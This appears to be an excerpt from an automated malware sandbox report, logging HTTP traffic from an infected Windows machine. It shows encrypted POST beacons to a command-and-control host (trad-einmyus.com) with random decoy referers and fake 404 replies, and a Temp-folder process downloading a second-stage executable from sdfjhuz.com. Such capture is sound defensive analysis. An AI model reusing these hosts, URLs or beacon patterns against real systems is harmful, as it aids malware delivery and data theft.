                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.300101995 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://lvxpewpgqyblpfqc.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 278
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.300136089 CET278OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 42 a2 a5 69
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dBi+=P<mHL>^6yrP[g-//{,)|$&#g(lLFIYGUv3oDytRdMb6Q5n5}AlVldHuSk}W
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.534506083 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:06 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.538764000 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://anwvnbknhlqgd.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 158
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.538803101 CET158OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 5d b4 b2 7b
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d]{#}~rKFldIdgnI=]b4%t0V:Y-nh|/7j3ZkSEN
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:07.794843912 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:07 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:07.800272942 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rbrnvdnfmew.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.106503963 CET436OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rbrnvdnfmew.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Data Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.262037039 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:07 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.419060946 CET436OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rbrnvdnfmew.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Data Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.444458008 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:08 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.446342945 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://yfuerexislgu.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 328
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.791773081 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:08 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.793400049 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://upixukbaggkkpn.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 292
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.147526026 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:10 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.149513960 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://nksopmxhnnxiata.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 352
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.523086071 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:10 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.525037050 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://arvbscjewhsui.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 248
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.881932020 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:10 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:10.884358883 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://msmrjqievyxvat.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 164
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.258346081 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:11 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.273066998 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://sswicaghdws.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 209
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.656388998 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:11 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.658488989 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://xueylbuhcqkh.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 264
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.064492941 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:11 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.067142963 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://ywbvdqwewtk.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 273
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.684627056 CET554OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://ywbvdqwewtk.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 273
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Data Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.739370108 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:11 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.309776068 CET554OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://ywbvdqwewtk.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 273
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Data Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.665885925 CET211INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:13 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 32 46 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cc d5 54 02 6c 5c e5 aa 81 fc ab 12 ea 15 da 2d b8 45 52 9d 0b fe ee 3a ae 2f 4d 1b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2FI:82OTl\-ER:/M0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.649714189.232.22.59804436C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:07.691082954 CET91OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: sdfjhuz.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.362680912 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:08 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 283648
                                                                                                                                                                                                                                      Last-Modified: Wed, 27 Mar 2024 17:00:03 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "66045093-45400"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
